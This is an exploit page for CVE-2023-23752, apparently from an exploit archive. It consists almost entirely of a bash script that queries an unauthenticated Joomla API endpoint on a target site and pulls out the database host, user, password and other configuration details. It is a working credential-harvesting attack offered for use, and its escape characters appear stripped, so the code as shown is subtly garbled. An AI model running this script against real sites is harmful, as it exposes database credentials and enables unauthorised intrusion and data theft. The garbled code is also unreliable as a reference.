Joomla versions 4.2.8 and below remote unauthenticated information disclosure exploit.
advisories | CVE-2023-23752
#!/bin/bash
# Exploit Title: Joomla! <= 4.2.8 - Unauthenticated Information Disclosure
# Date: 2024-05-21
# CVE: CVE-2023-23752
# Exploit Author: Miguel Redondo (aka d4t4s3c)
# Vendor Homepage: https://www.joomla.org
# Software Link: https://downloads.joomla.org
# Version: <= 4.2.8
# Tested on: Linux
# Category: Web Application
while getopts ":u:" arg; do
case ${arg} in
u) url=${OPTARG}; let parameter_counter+=1 ;;
esac
done
if [ -z "${url}" ]; then
echo -e "n[*] Joomla! <= 4.2.8 - Unauthenticated Information Disclosure"
echo -e "n[-] Usage: CVE-2023-23752.sh -u <url>n"
exit 1
else
echo -e "n[*] Joomla! <= 4.2.8 - Unauthenticated Information Disclosure"
curl --silent --insecure "${url}/api/index.php/v1/config/application?public=true" > out.tmp
echo -e "n[i] Database info:n"
echo -e "[+] DB Type: $(sed -E 's/.*"dbtype":"([^"]+)".*/1/' out.tmp)"
echo -e "[+] DB Host: $(sed -E 's/.*"host":"([^"]+)".*/1/' out.tmp)"
echo -e "e[92m[+] DB User: $(sed -E 's/.*"user":"([^"]+)".*/1/' out.tmp)e[0m"
echo -e "e[92m[+] DB Password: $(sed -E 's/.*"password":"([^"]+)".*/1/' out.tmp)e[0m"
echo -e "[+] DB Name: $(sed -E 's/.*"db":"([^"]+)".*/1/' out.tmp)"
echo -e "[+] DB Prefix: $(sed -E 's/.*"dbprefix":"([^"]+)".*/1/' out.tmp)"
echo -e "[+] DB Encryptation: $(sed -E 's/.*"dbencryption":([0-9]+).*/1/' out.tmp)n"
exit 0
fi